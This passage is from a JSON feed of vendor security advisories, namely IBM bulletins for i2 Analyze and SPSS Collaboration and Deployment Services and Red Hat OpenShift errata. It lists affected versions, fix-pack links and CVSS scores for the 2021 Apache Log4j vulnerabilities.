2.4.1.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.1.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyze| 4.3.4.0| bundled with EIA 2.4.0.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Analyze| 4.3.3.0| bundled with EIA 2.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.4.0.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.1.1| shipped with i2 Analyze 4.3.5.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.1.1.2-SEC-I2CONNECT-WinLinux-FP0001&includeSupersedes=0>) \ni2 Connect| 1.1.0| 
shipped with i2 Analyze 4.3.4.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.4.3-SEC-i2EIA-WinLinux-FP0003&includeSupersedes=0>) \ni2 Connect| 1.0.3| shipped with i2 Analyze 4.3.3.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.3.3-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyst's Notebook Premium| 9.3.1| Chart store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.1.2-SEC-I2ANBP-Win-FP0002&includeSupersedes=0>) \ni2 Analyst's Notebook Premium| 9.3.0| Chart Store component| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Analysts+Notebook+Premium&release=All&platform=All&function=fixId&fixids=9.3.0.3-SEC-I2ANBP-Win-FP0003&includeSupersedes=0>) \ni2 Analyze| 4.3.2.0| 
bundled with EIA 2.3.2.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.2.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Analyze| 4.3.2.0| bundled with EIA 2.3.3.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.3.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Enterprise+Insight+Analysis&release=All&platform=All&function=fixId&fixids=2.3.3.2-SEC-i2EIA-WinLinux-FP0002&includeSupersedes=0>) \ni2 Connect| 1.0.2| shipped with i2 Analyze 4.3.2.0| [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=i2&product=ibm/Other+software/i2+Connect&release=All&platform=All&function=fixId&fixids=1.0.2.2-SEC-I2CONNECT-WinLinux-FP0002&includeSupersedes=0>) \n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure 
Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSXVTH\",\"label\":\"i2 Analyze\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"ALL\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-31T20:13:22", "type": "ibm", "title": "Security Bulletin: IBM i2 Analyze and IBM i2 Analyst's Notebook Premium are 
affected by Apache Log4j Vulnerabilities (CVE-2021-45105 and CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-31T20:13:22", "id": "05C433115EE2DEF62DD69CA7C7E97FF424FB6D815F82B8FFDD0435DD323AC60F", "href": "https://www.ibm.com/support/pages/node/6537918", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-30T21:49:17", "description": "## Summary\n\nThere are vulnerabilities in the Apache Log4j open source library which is used by SPSS Collaboration and Deployment Services for logging of messages and traces. These issues have been addressed. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-45105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>) \n** DESCRIPTION: **Apache Log4j is vulnerable to a denial of service, caused by the failure to protect from uncontrolled recursion from self-referential lookups. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input data that contains a recursive lookup to cause a StackOverflowError that will terminate the process. Note: The vulnerability is also called LOG4J2-3230. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215647](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215647>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and achieve remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nSPSS Collaboration and Deployment Services| 8.3 \n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities now by installing the fix listed.**\n\n_Product_| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \nSPSS Collaboration and Deployment Services| 8.3.0.0| PH42959| [8.3.0.0-IM-SCaDS-IF005](<https://www.ibm.com/support/fixcentral/swg/downloadFixes?parent=SPSS&product=ibm/Information+Management/SPSS+Collaboration+and+Deployment+Services&release=8.3.0.0&platform=All&function=fixId&fixids=8.3.0.0-IM-SCaDS-IF005&login=true> \"8.3.0.0-IM-SCaDS-IF005\" ) \n\n**The fix needs to be applied to these components:**\n\nSPSS Collaboration and Deployment Services Repository Server\n\nSPSS Collaboration and Deployment Services Remote Scoring Server\n\nSPSS Collaboration and Deployment Services Remote Process Server\n\nSPSS Collaboration and Deployment Services Deployment Manager\n\n## Workarounds and Mitigations\n\nNone\n\n## Get 
Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n22 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS69YH\",\"label\":\"SPSS Collaboration and Deployment Services\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"8.3\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-22T15:04:37", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Apache Log4j affects SPSS Collaboration and Deployment Services", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-22T15:04:37", "id": "A326E188CED4EABC01874E1D337797D5BC22F3ADB5FAF12692F46CA9F4CEEEA1", "href": "https://www.ibm.com/support/pages/node/6536704", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": 
"2021-12-16T20:42:54", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T19:49:01", "type": "redhat", "title": "(RHSA-2021:5148) Critical: OpenShift Container Platform 4.8.24 extras security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": 
"2021-12-16T16:02:15", "id": "RHSA-2021:5148", "href": "https://access.redhat.com/errata/RHSA-2021:5148", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T20:39:56", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T07:44:46", "type": "redhat", "title": "(RHSA-2021:5141) Critical: OpenShift Container Platform 4.6.52 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T07:44:56", "id": "RHSA-2021:5141", "href": "https://access.redhat.com/errata/RHSA-2021:5141", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:38:41", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046 (CVE-2021-4125)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:35:00", "type": "redhat", "title": "(RHSA-2021:5184) Critical: OpenShift Container Platform 4.7.40 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:35:14", "id": "RHSA-2021:5184", "href": "https://access.redhat.com/errata/RHSA-2021:5184", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:42:20", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046 (CVE-2021-4125)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:25:00", "type": "redhat", "title": "(RHSA-2021:5186) Critical: OpenShift Container Platform 4.6.52 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": 
"NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:26:17", "id": "RHSA-2021:5186", "href": "https://access.redhat.com/errata/RHSA-2021:5186", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T22:42:44", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* kube-reporting/hive: Incomplete fix for log4j CVE-2021-44228 and CVE-2021-45046 (CVE-2021-4125)\n\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T21:10:20", "type": "redhat", "title": "(RHSA-2021:5183) Critical: OpenShift Container Platform 4.8.24 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-4125", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T21:10:33", "id": "RHSA-2021:5183", "href": "https://access.redhat.com/errata/RHSA-2021:5183", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-16T20:42:15", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-16T14:53:52", "type": "redhat", "title": "(RHSA-2021:5107) Critical: OpenShift Container Platform 4.7.40 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": 
"COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-43527", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-16T14:54:04", "id": "RHSA-2021:5107", "href": "https://access.redhat.com/errata/RHSA-2021:5107", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-11T11:33:52", "description": "Red Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an\nattacker-controlled string value (CVE-2021-44228)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T05:40:01", "type": "redhat", "title": "(RHSA-2021:5094) Moderate: OpenShift Container Platform 3.11.z security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
